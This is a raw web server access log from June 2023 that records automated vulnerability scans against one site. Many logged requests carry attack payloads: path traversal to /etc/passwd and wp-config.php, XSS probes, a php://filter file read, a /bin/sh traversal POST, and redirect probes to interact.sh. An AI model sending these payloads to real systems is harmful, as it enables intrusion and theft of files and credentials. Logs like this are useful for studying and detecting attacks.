107.189.31.184 - - [17/Jun/2023:21:56:58 +0530] "GET /test.txt HTTP/1.1" 404 1010
90.151.171.106 - - [17/Jun/2023:21:57:02 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:21:57:02 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:21:57:02 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:21:57:03 +0530] "GET /s/2RHou4rnHRRg1ZcEhR0V9vAkzoT/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 1192
107.189.31.184 - - [17/Jun/2023:21:57:06 +0530] "GET /s/2RHou4rnHRRg1ZcEhR0V9vAkzoT/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 1184
41.186.73.134 - - [17/Jun/2023:21:59:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:21:59:58 +0530] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
41.186.73.134 - - [17/Jun/2023:22:00:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:00:49 +0530] "GET /wp-content/plugins/cab-fare-calculator/tblight.php?action=1&ajax=1&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:22:00:49 +0530] "GET /wp-content/plugins/cab-fare-calculator/tblight.php?action=1&ajax=1&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1094
83.97.73.89 - - [17/Jun/2023:22:02:23 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
83.97.73.89 - - [17/Jun/2023:22:02:58 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
41.186.73.134 - - [17/Jun/2023:22:03:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:22:04:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:04:37 +0530] "GET /i553%3Cimg%20src=x%20data%27a%27onerror=alert%28domain%29%3E.childrenlist.html HTTP/1.1" 404 1150
107.189.31.184 - - [17/Jun/2023:22:04:38 +0530] "GET /sgyt%3Cimg%20src=x%20data%27a%27onerror=alert%28domain%29%3E.childrenlist.html HTTP/1.1" 404 1150
107.189.31.184 - - [17/Jun/2023:22:04:39 +0530] "GET /u0SO%3Cbr%3E%3Cbr%3Eplease%20authenticate%3Cbr%3E%3Cbr%3E.childrenlist.html HTTP/1.1" 404 1144
107.189.31.184 - - [17/Jun/2023:22:04:40 +0530] "GET /Bmyd%3Cbr%3E%3Cbr%3Eplease%20authenticate%3Cbr%3E%3Cbr%3E.childrenlist.html HTTP/1.1" 404 1144
107.189.31.184 - - [17/Jun/2023:22:04:54 +0530] "GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1164
107.189.31.184 - - [17/Jun/2023:22:04:55 +0530] "GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1164
45.128.232.141 - - [17/Jun/2023:22:05:13 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:22:05:25 +0530] "GET /tests/generate.php HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:22:05:25 +0530] "GET /tests/generate.php HTTP/1.1" 404 1030
198.98.50.108 - - [17/Jun/2023:22:06:15 +0530] "CONNECT myipb1a.mrrage.xyz:80 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:22:06:57 +0530] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 1092
107.189.31.184 - - [17/Jun/2023:22:06:57 +0530] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 1092
107.189.31.184 - - [17/Jun/2023:22:07:05 +0530] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:22:07:05 +0530] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:22:07:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:08:05 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:22:08:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:09:00 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:22:09:06 +0530] "GET /wp-admin/admin-ajax.php?action=8c1b70253866869e3e19202a4b00615c HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:22:09:07 +0530] "GET /wp-admin/admin-ajax.php?action=a84ac2df72ef9cf2a1f1442fa244c014 HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:22:09:08 +0530] "GET /wp-admin/admin-ajax.php?action=0371f949a0d24a6259cd8b183e77234a HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:22:09:09 +0530] "GET /wp-admin/admin-ajax.php?action=d1676d97484751d186de6cc293bd55ed HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:22:12:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:22:13:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:13:18 +0530] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1124
107.189.31.184 - - [17/Jun/2023:22:13:20 +0530] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1124
83.97.73.89 - - [17/Jun/2023:22:13:30 +0530] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:14:00 +0530] "GET /embed.js HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:22:14:02 +0530] "GET /embed.js HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:22:15:36 +0530] "GET /api/v2/cmdb/system/admin HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:22:15:37 +0530] "GET /api/v2/cmdb/system/admin HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:22:15:38 +0530] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 403 1004
107.189.31.184 - - [17/Jun/2023:22:15:39 +0530] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 403 1004
83.97.73.89 - - [17/Jun/2023:22:16:09 +0530] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:16:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:16:49 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_advertising HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:16:50 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_advertising HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:17:05 +0530] "GET /?pp=env HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:17:06 +0530] "GET /?pp=env HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:17:11 +0530] "GET /api/stats HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:17:12 +0530] "GET /api/stats HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:17:13 +0530] "GET /horizon/api/stats HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:17:14 +0530] "GET /horizon/api/stats HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:22:17:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:18:05 +0530] "POST /mifs/.;/services/LogService HTTP/1.1" 404 1048
83.97.73.89 - - [17/Jun/2023:22:18:16 +0530] "POST /mifs/.;/services/LogService HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:22:20:29 +0530] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 1082
107.189.31.184 - - [17/Jun/2023:22:20:30 +0530] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 1082
107.189.31.184 - - [17/Jun/2023:22:20:31 +0530] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:22:20:32 +0530] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 1076
41.186.73.134 - - [17/Jun/2023:22:20:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:22:21:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:22:42 +0530] "GET /storage/logs/laravel.log HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:22:22:43 +0530] "GET /storage/logs/laravel.log HTTP/1.1" 404 1042
83.97.73.89 - - [17/Jun/2023:22:24:15 +0530] "GET /console/ HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:22:24:22 +0530] "POST /classes/Login.php?f=login HTTP/1.1" 404 1028
192.241.194.9 - - [17/Jun/2023:22:24:23 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:24:23 +0530] "POST /classes/Login.php?f=login HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:24:24 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:24:26 +0530] "GET / HTTP/1.1" 200 11250
192.241.194.9 - - [17/Jun/2023:22:24:52 +0530] "GET / HTTP/1.1" 200 11250
192.241.236.39 - - [17/Jun/2023:22:24:57 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:25:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:25:01 +0530] "GET /console/ HTTP/1.1" 404 1010
192.241.236.39 - - [17/Jun/2023:22:25:08 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:26:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:27:30 +0530] "GET /squid.svg?background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&title=Not%20Found HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:27:31 +0530] "GET /squid.svg?background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&title=Not%20Found HTTP/1.1" 404 1012
83.97.73.89 - - [17/Jun/2023:22:28:38 +0530] "GET /_ignition/execute-solution HTTP/1.1" 404 1046
41.186.73.134 - - [17/Jun/2023:22:29:12 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:29:14 +0530] "GET /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:22:29:29 +0530] "POST /xmlpserver/services/XMLPService HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:22:29:30 +0530] "POST /xmlpserver/services/XMLPService HTTP/1.1" 404 1056
41.186.73.134 - - [17/Jun/2023:22:30:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:22:31:40 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:22:31:40 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:22:31:40 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:22:31:40 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:22:31:40 +0530] "GET /goform/activate_process?akey&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&hostid&isv HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:22:31:41 +0530] "GET /goform/activate_process?akey&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&hostid&isv HTTP/1.1" 404 1040
90.151.171.106 - - [17/Jun/2023:22:31:45 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [17/Jun/2023:22:31:45 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:22:31:45 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [17/Jun/2023:22:31:45 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:22:31:47 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:22:31:48 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:22:32:35 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:22:32:35 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:22:32:37 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:22:32:38 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:22:32:45 +0530] "GET /login.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:32:46 +0530] "GET /login.php HTTP/1.1" 404 1012
83.97.73.89 - - [17/Jun/2023:22:33:21 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:33:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:33:38 +0530] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:33:38 +0530] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:22:34:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:36:19 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:37:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:38:32 +0530] "GET /client/index.php HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:22:38:32 +0530] "GET /client/index.php HTTP/1.1" 404 1026
41.186.73.134 - - [17/Jun/2023:22:38:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:40:16 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:40:18 +0530] "GET /static../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:21 +0530] "GET /js../.git/config HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:22:40:23 +0530] "GET /images../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:25 +0530] "GET /static../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:26 +0530] "GET /img../.git/config HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:40:28 +0530] "GET /js../.git/config HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:22:40:29 +0530] "GET /css../.git/config HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:40:31 +0530] "GET /images../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:32 +0530] "GET /assets../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:33 +0530] "GET /img../.git/config HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:40:35 +0530] "GET /content../.git/config HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:22:40:37 +0530] "GET /css../.git/config HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:40:37 +0530] "GET /events../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:40 +0530] "GET /assets../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:40 +0530] "GET /media../.git/config HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:40:43 +0530] "GET /lib../.git/config HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:40:43 +0530] "GET /content../.git/config HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:22:40:46 +0530] "GET /events../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:49 +0530] "GET /media../.git/config HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:40:52 +0530] "GET /lib../.git/config HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:22:42:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
98.159.100.141 - - [17/Jun/2023:22:42:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
98.159.100.141 - - [17/Jun/2023:22:42:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:42:40 +0530] "POST /user/login/login HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:22:42:41 +0530] "POST /user/login/login HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:22:42:42 +0530] "GET /user/main HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:42:45 +0530] "GET /user/main HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:22:43:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:43:58 +0530] "GET /apisix/admin/migrate/export HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:22:43:59 +0530] "GET /apisix/admin/migrate/export HTTP/1.1" 404 1048
83.97.73.89 - - [17/Jun/2023:22:44:21 +0530] "GET / HTTP/1.1" 200 11250
87.120.88.58 - - [17/Jun/2023:22:44:34 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:22:44:46 +0530] "GET /static/ueditor/php/controller.php?action=proxy&maxwidth=-1&referer=test&remote=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:22:44:46 +0530] "GET /static/ueditor/php/controller.php?action=proxy&maxwidth=-1&referer=test&remote=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:22:46:09 +0530] "GET /bitrix/rk.php?goto=https://interact.sh HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:11 +0530] "GET /bitrix/redirect.php?event1&event2&event3&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:13 +0530] "GET /bitrix/redirect.php?event3=352513&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:15 +0530] "GET /bitrix/rk.php?goto=https://interact.sh HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:16 +0530] "GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:18 +0530] "GET /bitrix/redirect.php?event1&event2&event3&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:19 +0530] "GET /bitrix/redirect.php?event1=select_product_t1&event2=contributions&goto=https://interact.sh&site_id=s1 HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:20 +0530] "GET /bitrix/redirect.php?event3=352513&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:22 +0530] "GET /bitrix/redirect.php?event1&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:23 +0530] "GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:24 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh&id=28&site_id=s2 HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:22:46:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:46:26 +0530] "GET /bitrix/redirect.php?event1=select_product_t1&event2=contributions&goto=https://interact.sh&site_id=s1 HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:27 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh&id=84&site_id=n1 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:29 +0530] "GET /bitrix/redirect.php?event1&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:30 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh&id=691&site_id=s3 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:32 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh&id=28&site_id=s2 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:33 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh&id=129 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:34 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh&id=84&site_id=n1 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:35 +0530] "GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:37 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh&id=691&site_id=s3 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:37 +0530] "GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:39 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh&id=129 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:41 +0530] "GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:43 +0530] "GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
83.97.73.89 - - [17/Jun/2023:22:46:48 +0530] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:22:47:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:48:13 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_awdwall HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:48:13 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_awdwall HTTP/1.1" 404 1012
83.97.73.89 - - [17/Jun/2023:22:48:52 +0530] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:22:50:12 +0530] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:22:50:14 +0530] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:22:50:34 +0530] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:22:50:34 +0530] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 1036
83.97.73.89 - - [17/Jun/2023:22:50:37 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:50:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:22:51:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:51:51 +0530] "GET /index.php?p=%22;alert(document.domain);%22&v=d HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:51:51 +0530] "GET /index.php?p=%22;alert(document.domain);%22&v=d HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:52:37 +0530] "GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 1068
107.189.31.184 - - [17/Jun/2023:22:52:37 +0530] "GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 1068
83.97.73.89 - - [17/Jun/2023:22:54:38 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:54:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:55:15 +0530] "GET /remote/loginredir?redir=javascript:alert(document.domain) HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:55:16 +0530] "GET /remote/loginredir?redir=javascript:alert(document.domain) HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:22:55:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:56:49 +0530] "GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1" 404 992
107.189.31.184 - - [17/Jun/2023:22:56:49 +0530] "GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1" 404 992
83.97.73.89 - - [17/Jun/2023:22:58:09 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:22:58:30 +0530] "GET /_profiler/empty/search/results?limit=10 HTTP/1.1" 404 1054
